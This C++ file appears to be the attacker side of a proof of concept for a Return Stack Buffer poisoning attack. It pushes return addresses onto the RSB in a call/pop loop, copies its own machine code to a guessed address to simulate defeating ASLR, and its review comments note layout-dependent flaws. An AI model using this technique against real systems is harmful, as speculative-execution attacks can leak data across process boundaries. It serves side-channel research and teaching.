#include "util.hpp"
#include <iostream>
#include <fstream>
#include <unistd.h>
#include <sched.h>
using namespace std;
// Run "call" instructions in a loop. This pushes many return
// addresses onto the RSB for the attacker to use.
// In a real program, a context switch during a function will
// have the same effect - the victim pushes an address onto the
// RSB which is consumed by the attacker.
//
// Never returns: `call lbl` re-enters the loop and `pop %rax`
// discards the return address that call pushed, so the stack stays
// balanced and the loop runs until the process is killed. main()
// also copies this function's raw bytes elsewhere and runs the copy,
// so the exact layout of the generated code matters (see below).
void callLoop() {
// Call loop is 30 bytes beyond addressLbl
// NOTE(review): the 30-byte offset is hard-coded, not computed; it is
// tied to this compiler's code layout for the printf call below and
// must be re-checked whenever the compiler, flags or format string
// change. `&&addressLbl` is the GCC/Clang "address of label" extension.
addressLbl: printf("Call loop located at %p\n", (&&addressLbl)+30);
// Call instructions push the instruction pointer onto the stack.
// Pop %rax to avoid overflowing the stack.
// NOTE(review): the asm statement has no clobber list, so the compiler
// is not told that %rax is modified; that is only harmless because no
// code after the loop is ever reached. `lbl` is also a plain assembler
// symbol: if the compiler emits this asm twice (e.g. inlining callLoop
// into main while keeping the out-of-line copy that `&callLoop` needs),
// the assembler reports a duplicate label; a local numbered label
// (`1:` / `call 1b`) would avoid that.
asm(
"lbl:"
"pop %rax;"
"call lbl;"
);
}
// Entry point. With no arguments the program relocates callLoop's bytes
// to a chosen address and runs the copy (mode 1); with any argument it
// runs callLoop in place, at whatever address the loader picked
// (mode 2). Neither mode returns in practice, because callLoop loops
// forever. `map` and `ADDR_PTR` come from util.hpp.
int main(int argc, char *argv[]) {
    // Mode 2: offset is randomly generated by ASLR
    if (argc != 1) {
        callLoop();
        return 0;
    }

    // Mode 1: choose a random starting address (simulating ASLR) and attacker guesses it.
    const auto wanted = reinterpret_cast<void *>(0x0000555555587000);
    printf("requesting memory at %p\n", wanted);

    // Ask the project helper for a mapping one page below the requested
    // address. NOTE(review): the result is used unchecked; confirm what
    // map() yields on failure (nullptr or MAP_FAILED) before relying on
    // this outside a demo.
    const ADDR_PTR base = reinterpret_cast<ADDR_PTR>(wanted) - 4096;
    void *const relocated = map(reinterpret_cast<void *>(base), 1024);
    printf("starting address is %p\n", relocated);

    // Copy the function's machine code into the new mapping.
    // NOTE(review): this copies 1024 bytes starting at callLoop, almost
    // certainly more than the function's own size; memcpy moves bytes
    // only, so any RIP-relative references the compiler emitted inside
    // callLoop (e.g. its printf call) are not adjusted for the new address.
    memcpy(relocated, reinterpret_cast<void *>(&callLoop), 1024);
    printf("Function is running at virtual address %p.\n", relocated);

    // Jump into the relocated copy; it does not return.
    reinterpret_cast<void (*)()>(relocated)();
    return 0;
}